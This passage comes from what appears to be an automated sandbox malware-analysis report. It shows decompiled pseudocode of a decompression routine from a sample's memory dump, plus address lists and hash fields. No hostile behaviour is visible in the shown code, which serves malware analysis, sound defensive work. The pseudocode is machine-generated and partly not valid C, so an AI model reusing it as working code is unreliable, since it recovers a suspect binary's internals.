							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406bc0
0x00406bc7
0x00406bcd
0x00406bd3
0x00000000
0x00406bd7
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bf9
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c0e
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c59
0x00406c5c
0x00406c84
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c5e
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c76
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406ccd
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd2
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cef
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d35
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073dd
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x00407413
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743b
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406dcf
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
